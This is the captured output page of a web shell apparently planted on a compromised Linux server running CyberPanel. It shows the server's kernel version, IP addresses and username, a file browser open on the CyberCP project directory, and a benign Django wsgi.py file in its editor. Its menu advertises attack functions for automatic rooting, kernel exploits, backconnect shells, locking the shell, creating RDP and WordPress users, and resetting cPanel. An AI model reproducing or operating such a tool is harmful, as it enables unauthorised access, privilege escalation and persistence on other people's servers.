Linux cyberpanel 5.15.0-156-generic #166-Ubuntu SMP Sat Aug 9 00:02:46 UTC 2025 x86_64
LiteSpeed
: 160.191.175.3 | : 216.73.216.114
Cant Read [ /etc/named.conf ]
8.2.29
aodai6801
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
local /
CyberCP /
CyberCP /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
SecurityLevel.py
169
B
-rw-r--r--
__init__.py
0
B
-rw-r--r--
secMiddleware.py
15.75
KB
-rw-r--r--
settings.py
5.61
KB
-rw-r-----
urls.py
2.16
KB
-rw-r--r--
wsgi.py
393
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : wsgi.py
""" WSGI config for CyberCP project. It exposes the WSGI callable as a module-level variable named ``application``. For more information on this file, see https://docs.djangoproject.com/en/1.11/howto/deployment/wsgi/ """ import os from django.core.wsgi import get_wsgi_application os.environ.setdefault("DJANGO_SETTINGS_MODULE", "CyberCP.settings") application = get_wsgi_application()
Close